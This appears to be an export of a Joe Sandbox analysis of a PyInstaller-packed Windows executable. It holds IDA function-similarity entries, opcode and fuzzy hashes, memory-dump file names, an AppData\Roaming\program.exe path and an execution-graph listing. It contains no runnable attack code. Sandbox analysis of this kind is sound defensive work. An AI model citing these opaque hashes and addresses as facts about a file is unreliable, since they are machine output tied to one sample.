                                                                                                                                                                                                                                  • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                  • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                  • Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                  • Instruction ID: 9168ac49bc1544466ca037400ab4dc9444bc15183802600d0e4d9c06423c100f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FA819672D081429DE7667E25C910379B6F2FB31768FF54039CA0997285CF2EB9019B23
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                  • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                  • Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                                  • Instruction ID: b353b5b21308d8c34528948bb3da8c03ed2b24e3718d2fcd16a3f259ff3d6573
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 13519136A196028ADB16EB15D944A7DB792FB64BE8FA04130DB4D477C8DF7CE841CB10
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                                                                                                                  • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                  • Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                                  • Instruction ID: c4a12d63d9c9e1749a6b0f7ed45af4343cb6e5eddea43c0770adb01e305bf7a3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C2619E32908BC585EB31AF15E8403AAB7A1FB957E8F544225EB9C03B99DF7DD090CB10
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
Similarity
• API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
• String ID: csm$csm
• API String ID: 3896166516-3733052814
APIs
• CreateDirectoryW.KERNEL32(00000000,?,00007FF72C65352C,?,00000000,00007FF72C653F23), ref: 00007FF72C657F32
Strings
Memory Dump Source
• Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
Similarity
• API ID: CreateDirectory
• String ID: %.*s$%s%c$\
• API String ID: 4241100979-1685191245
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
Similarity
• API ID: Message
• String ID: ERROR$Error$[PYI-%d:%ls]
• API String ID: 2030045667-255084403
APIs
Memory Dump Source
• Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
Similarity
• API ID: FileWrite$ConsoleErrorLastOutput
• String ID:
• API String ID: 2718003287-0
APIs
Memory Dump Source
• Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
Similarity
• API ID: _get_daylight$_isindst
• String ID:
• API String ID: 4170891091-0
APIs
Memory Dump Source
• Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
Similarity
• API ID: File$ErrorHandleInformationLastNamedPeekPipeType
• String ID:
• API String ID: 2780335769-0
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1956198572-0
                                                                                                                                                                                                                                  • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                  • Instruction ID: b2b7638f0be3dba353e948db6fc7c658ebe20f7f021b8a8a3537daf0698cbfa2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0211E931A0C14242F656A769ED4927A9353FFA47E0FD44030DB4907B8DCD2DD4D58A10
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID: ?
                                                                                                                                                                                                                                  • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                  • Opcode ID: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                                                                                                                                                                                                  • Instruction ID: 2c8d51917cfdedeef6d7a7d46cd1ee7869b08b06d17c0088ae84c53382110e74
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B1414912A0838242FB22AB259C52379E762FBA0BB4F944679EE5C07AD5DF3CD445CF10
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 00007FF72C669046
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C66A948: RtlFreeHeap.NTDLL(?,?,?,00007FF72C672D22,?,?,?,00007FF72C672D5F,?,?,00000000,00007FF72C673225,?,?,?,00007FF72C673157), ref: 00007FF72C66A95E
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C66A948: GetLastError.KERNEL32(?,?,?,00007FF72C672D22,?,?,?,00007FF72C672D5F,?,?,00000000,00007FF72C673225,?,?,?,00007FF72C673157), ref: 00007FF72C66A968
                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF72C65CBA5), ref: 00007FF72C669064
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID: C:\Users\user\AppData\Roaming\program.exe
                                                                                                                                                                                                                                  • API String ID: 3580290477-4122129678
                                                                                                                                                                                                                                  • Opcode ID: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
                                                                                                                                                                                                                                  • Instruction ID: f4feaf36a7a1201411cbf3947db74d7d10bf82483e76da0c7c89f30fbfe82c50
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FB417031A0860285EB1AAF219D401BCB3A6FF547A4BA54039ED4E47B85DE3DD481CB60
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                  • String ID: U
                                                                                                                                                                                                                                  • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                  • Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                  • Instruction ID: 7c5b059ea10da6695cd57e5382a94c849e9edd373851d585ba448e8953ba70c0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AD41E532718E8191DB219F25E8443A9B7A2FBA87A4F904135EE4D87788EF3CD401CB60
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentDirectory
                                                                                                                                                                                                                                  • String ID: :
                                                                                                                                                                                                                                  • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                  • Opcode ID: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
                                                                                                                                                                                                                                  • Instruction ID: e6e70bc9d0cd5a71794d595a94ef130351871ab5e2c65e8bef176cd5383bb8e3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D821F562B0828185EB22AB11D84426DB3B3FBA8B54FE54039D64D83684CF7DE5448F62
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
• Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
Similarity
• API ID: ExceptionFileHeaderRaise
• String ID: csm
• API String ID: 2573137834-1018135373
• Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
• Instruction ID: d52d067b7d8bfc96dad9dc48c807845a0d80928504ad2c331d0c2c5901975ec5
• Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
• Instruction Fuzzy Hash: B9112E32619B8182EB629F15E840269B7E5FB98B94F584630DB8D07758DF3DD5518B00
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
Similarity
• API ID: DriveType_invalid_parameter_noinfo
• String ID: :
• API String ID: 2595371189-336475711
• Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
• Instruction ID: de437b14411f05c41366f98addbcf7da6c64e9c8c915a142f4c2d4a1453642d3
• Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
• Instruction Fuzzy Hash: EF01842191864385F722BF60986227EB7A1FFA8768FD01839D54D42685DF3CD5098F74

Execution Graph

Execution Coverage: 4.9%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 1.7%
Total number of Nodes: 1064
Total number of Limit Nodes: 99
63243->63166 63244 7ff72c66039c _fread_nolock 53 API calls 63244->63245 63245->63241 63245->63244 63246 7ff72c6515d6 63245->63246 63278 7ff72c664f08 11 API calls _get_daylight 63246->63278 63248 7ff72c6515db 63279 7ff72c652910 54 API calls _log10_special 63248->63279 63250->63162 63252 7ff72c651268 63251->63252 63253 7ff72c651297 63252->63253 63254 7ff72c65126f 63252->63254 63257 7ff72c6512d4 63253->63257 63258 7ff72c6512b1 63253->63258 63284 7ff72c652710 54 API calls _log10_special 63254->63284 63256 7ff72c651282 63256->63241 63262 7ff72c6512e6 63257->63262 63271 7ff72c651309 memcpy_s 63257->63271 63285 7ff72c664f08 11 API calls _get_daylight 63258->63285 63260 7ff72c6512b6 63286 7ff72c652910 54 API calls _log10_special 63260->63286 63287 7ff72c664f08 11 API calls _get_daylight 63262->63287 63264 7ff72c6512eb 63288 7ff72c652910 54 API calls _log10_special 63264->63288 63265 7ff72c66039c _fread_nolock 53 API calls 63265->63271 63267 7ff72c6512cf __std_exception_copy 63267->63241 63268 7ff72c6513cf 63289 7ff72c652710 54 API calls _log10_special 63268->63289 63271->63265 63271->63267 63271->63268 63272 7ff72c660110 37 API calls 63271->63272 63280 7ff72c660adc 63271->63280 63272->63271 63273->63227 63274->63232 63275->63241 63276->63239 63277->63241 63278->63248 63279->63241 63281 7ff72c660b0c 63280->63281 63290 7ff72c66082c 63281->63290 63283 7ff72c660b2a 63283->63271 63284->63256 63285->63260 63286->63267 63287->63264 63288->63267 63289->63267 63291 7ff72c66084c 63290->63291 63292 7ff72c660879 63290->63292 63291->63292 63293 7ff72c660856 63291->63293 63294 7ff72c660881 63291->63294 63292->63283 63304 7ff72c66a814 37 API calls 2 library calls 63293->63304 63297 7ff72c66076c 63294->63297 63305 7ff72c66546c EnterCriticalSection 63297->63305 63299 7ff72c660789 63300 7ff72c6607ac 74 API calls 63299->63300 63301 7ff72c660792 63300->63301 63302 7ff72c665478 _fread_nolock LeaveCriticalSection 63301->63302 63303 7ff72c66079d 63302->63303 63303->63292 63304->63292 63308 
7ff72c6649de 63306->63308 63307 7ff72c664a03 63324 7ff72c66a814 37 API calls 2 library calls 63307->63324 63308->63307 63310 7ff72c664a3f 63308->63310 63325 7ff72c662c10 49 API calls _invalid_parameter_noinfo 63310->63325 63312 7ff72c664b1c 63328 7ff72c66a948 11 API calls 2 library calls 63312->63328 63314 7ff72c65c550 _log10_special 8 API calls 63316 7ff72c651cc8 63314->63316 63315 7ff72c664ad6 63315->63312 63317 7ff72c664b40 63315->63317 63318 7ff72c664af1 63315->63318 63319 7ff72c664ae8 63315->63319 63316->62723 63317->63312 63320 7ff72c664b4a 63317->63320 63326 7ff72c66a948 11 API calls 2 library calls 63318->63326 63319->63312 63319->63318 63327 7ff72c66a948 11 API calls 2 library calls 63320->63327 63323 7ff72c664a2d 63323->63314 63324->63323 63325->63315 63326->63323 63327->63323 63328->63323 63330 7ff72c665ec8 63329->63330 63331 7ff72c665eee 63330->63331 63334 7ff72c665f21 63330->63334 63360 7ff72c664f08 11 API calls _get_daylight 63331->63360 63333 7ff72c665ef3 63361 7ff72c66a8e0 37 API calls _invalid_parameter_noinfo 63333->63361 63336 7ff72c665f27 63334->63336 63337 7ff72c665f34 63334->63337 63362 7ff72c664f08 11 API calls _get_daylight 63336->63362 63348 7ff72c66ac28 63337->63348 63340 7ff72c654616 63340->62975 63342 7ff72c665f48 63363 7ff72c664f08 11 API calls _get_daylight 63342->63363 63343 7ff72c665f55 63355 7ff72c66fecc 63343->63355 63346 7ff72c665f68 63364 7ff72c665478 LeaveCriticalSection 63346->63364 63365 7ff72c6702d8 EnterCriticalSection 63348->63365 63350 7ff72c66ac3f 63351 7ff72c66ac9c 19 API calls 63350->63351 63352 7ff72c66ac4a 63351->63352 63353 7ff72c670338 _isindst LeaveCriticalSection 63352->63353 63354 7ff72c665f3e 63353->63354 63354->63342 63354->63343 63366 7ff72c66fbc8 63355->63366 63358 7ff72c66ff26 63358->63346 63360->63333 63361->63340 63362->63340 63363->63340 63372 7ff72c66fc03 __vcrt_InitializeCriticalSectionEx 63366->63372 63367 7ff72c66fdca 63371 7ff72c66fdd3 63367->63371 63384 7ff72c664f08 11 API calls _get_daylight 
63367->63384 63369 7ff72c66fea1 63385 7ff72c66a8e0 37 API calls _invalid_parameter_noinfo 63369->63385 63371->63358 63378 7ff72c676d54 63371->63378 63372->63367 63381 7ff72c667a3c 51 API calls 3 library calls 63372->63381 63374 7ff72c66fe35 63374->63367 63382 7ff72c667a3c 51 API calls 3 library calls 63374->63382 63376 7ff72c66fe54 63376->63367 63383 7ff72c667a3c 51 API calls 3 library calls 63376->63383 63386 7ff72c676354 63378->63386 63381->63374 63382->63376 63383->63367 63384->63369 63385->63371 63387 7ff72c67636b 63386->63387 63388 7ff72c676389 63386->63388 63440 7ff72c664f08 11 API calls _get_daylight 63387->63440 63388->63387 63390 7ff72c6763a5 63388->63390 63397 7ff72c676964 63390->63397 63391 7ff72c676370 63441 7ff72c66a8e0 37 API calls _invalid_parameter_noinfo 63391->63441 63395 7ff72c67637c 63395->63358 63443 7ff72c676698 63397->63443 63400 7ff72c6769d9 63475 7ff72c664ee8 11 API calls _get_daylight 63400->63475 63401 7ff72c6769f1 63463 7ff72c668520 63401->63463 63404 7ff72c6769de 63476 7ff72c664f08 11 API calls _get_daylight 63404->63476 63432 7ff72c6763d0 63432->63395 63442 7ff72c6684f8 LeaveCriticalSection 63432->63442 63440->63391 63441->63395 63444 7ff72c6766c4 63443->63444 63452 7ff72c6766de 63443->63452 63444->63452 63488 7ff72c664f08 11 API calls _get_daylight 63444->63488 63446 7ff72c6766d3 63489 7ff72c66a8e0 37 API calls _invalid_parameter_noinfo 63446->63489 63448 7ff72c6767ad 63450 7ff72c67680a 63448->63450 63494 7ff72c669b78 37 API calls 2 library calls 63448->63494 63449 7ff72c67675c 63449->63448 63492 7ff72c664f08 11 API calls _get_daylight 63449->63492 63450->63400 63450->63401 63452->63449 63490 7ff72c664f08 11 API calls _get_daylight 63452->63490 63454 7ff72c676806 63454->63450 63457 7ff72c676888 63454->63457 63456 7ff72c6767a2 63493 7ff72c66a8e0 37 API calls _invalid_parameter_noinfo 63456->63493 63495 7ff72c66a900 17 API calls _isindst 63457->63495 63458 7ff72c676751 63491 7ff72c66a8e0 37 API calls _invalid_parameter_noinfo 
